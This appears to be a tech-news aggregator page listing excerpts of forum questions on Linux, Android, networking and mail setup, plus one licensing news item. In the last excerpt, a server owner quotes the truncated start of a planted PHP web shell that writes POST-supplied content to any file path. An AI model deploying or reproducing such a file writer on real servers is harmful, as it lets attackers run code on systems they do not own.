8
Reading the protected framebuffer - Linux, Androidview story

http://stackoverflow.com – Platform : Arm CPU, Android Jellybean - Linux 3.4(customized for Android) Project : A debug tool collecting various dumps on a system crash. Work so far : Using Ion memory (available from ICS), i am collecting the complete dump on a soft reboot resulting from system crash. Problem : I want to store the screenshot at the time of crash. (HowTos)

8
dig not returning any resultsview story

http://forums.fedoraforum.org – my fedora 18 install came with bind and bind utils already, when i query for example host -t ns google.com it shows me google nameservers, but when i try dig google.com and also dig for ns or mx i always get the same result no matter what option i give to dig. (HowTos)

8
can't find a way to forward in iptables for specific mac addressview story

http://serverfault.com – I use a linux Centos 6.3 as an Internet gateway with NAT. I want to allow a specific host to have access to Internet, but not with IP address, because IP may change due to dhcp, and use a rule for a specific mac address. I used the following but it does not work iptables -t nat -A POSTROUTING -o $INTERNETDEVICE -j MASQUERADE iptables -A INPUT -i $INTERNETDEVICE -m state --state ESTABLISHED,RELA (HowTos)

8
Get postfix to forward root's mailview story

http://serverfault.com – I have an Ubuntu server running postfix. It is not the mail server for my domain. Whenever a cron job runs for root, the output mail is not delivered locally, instead it gets sent to root@mydomain.com via the main mail server. (HowTos)

8
What am I doing wrong!view story

http://forums.androidcentral.com – Here are my issues: I can't send MMS/text messages to an e-mail address, i. e., from my phone to XXXXXXXXXX@gmail.com, for example. If I am logged in to Google (and I don't want to stay logged in), I am able to send from my phone to my wife's phone (Straight Talk). I can't find the proper APN to get it to work. I can answer/send to phone numbers with no problem. (HowTos)

8
[ubuntu] Could not download all repository indexes>> Can Anyone help me?view story

http://ubuntuforums.org – hi, I'm a newbie ubuntu user and I'm starting to like it's environment and stuff. (Hardware)

8
Linux : IP address to service?view story

http://stackoverflow.com – I have an app running as a daemon on a linux box (Red Hat). The purpose of the app is to act as a registrar of sorts -- another device can connect to this host machine, and register (this is me, I am here -- this kind of thing). There is more than one IP address for this machine. How do I connect/send/forward incoming connections (i.e., the registration data) to my daemon? (HowTos)

8
linux block driver queueview story

http://stackoverflow.com – I have written a block driver for a SATA drive. I have some printk statements so I can see what is happening. When I process a new request, the requests always seem to be 8 sectors (4096 bytes) in size. Even if the address of each request follows on the Kernel doesn't seem to combine them into 1 big request. (HowTos)

8
Office 2013 Retail Licensing: Microsoft Deserves Credit for Eating Crowview story

http://www.thevarguy.com – Give Microsoft (NASDAQ: MSFT) credit. The company listened to customer complaints about its Office 2013 retail licensing agreement. Now, Microsoft has altered the licensing language to appease customers. (IT news)

8
Constantly someone is making request for index.xmlview story

http://serverfault.com – My server was recently been compromised due to Joomla and allow_url_fopen = ON I see various php files on my server root having this content in them Restricted accoss <?php error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout", 2); ob_implicit_flush (1); $file = "".$_POST["path"]; $fh = fopen ($file, 'w') or die(""); echo fwrite ($fh, stripslashes($_POST["r (HowTos)